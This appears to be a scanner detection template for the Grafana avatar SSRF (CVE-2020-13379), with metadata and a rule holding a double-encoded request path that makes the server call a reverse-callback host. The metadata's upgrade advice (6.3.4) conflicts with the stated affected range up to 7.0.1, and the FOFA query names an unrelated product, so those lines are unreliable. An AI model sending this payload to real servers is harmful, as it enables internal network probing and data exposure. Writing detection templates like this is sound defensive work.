id: CVE-2020-13379

info:
  name: Grafana 3.0.1-7.0.1 - Server-Side Request Forgery
  author: Joshua Rogers
  severity: high
  verified: true
  description: |
    Grafana 3.0.1 through 7.0.1 is susceptible to server-side request forgery via the avatar feature, which can lead to remote code execution. Any unauthenticated user/client can make Grafana send HTTP requests to any URL and return its result. This can be used to gain information about the network Grafana is running on, thereby potentially enabling an attacker to obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.
    SHODAN: title:"Grafana"
    FOFA: title="iXCache"
  reference:
    - https://github.com/advisories/GHSA-wc9w-wvq2-ffm9
    - https://github.com/grafana/grafana/commit/ba953be95f0302c2ea80d23f1e5f2c1847365192
    - http://www.openwall.com/lists/oss-security/2020/06/03/4
    - https://nvd.nist.gov/vuln/detail/CVE-2020-13379
    - http://lists.opensuse.org/opensuse-security-announce/2020-06/msg00060.html
  solutions: Upgrade to 6.3.4 or higher.
  tags: cve,cve2020,grafana,ssrf
  created: 2023/07/31

set:
  reverse: newReverse()
  reverseHost: reverse.url.host
rules:
  r0:
    request:
      method: GET
      path: /avatar/1%3fd%3dhttp%3A%252F%252Fimgur.com%252F..%25252F{{reverseHost}}
    expression: response.status == 200 && response.raw_header.bcontains(b'image/jpeg') && reverse.wait(5)
expression: r0()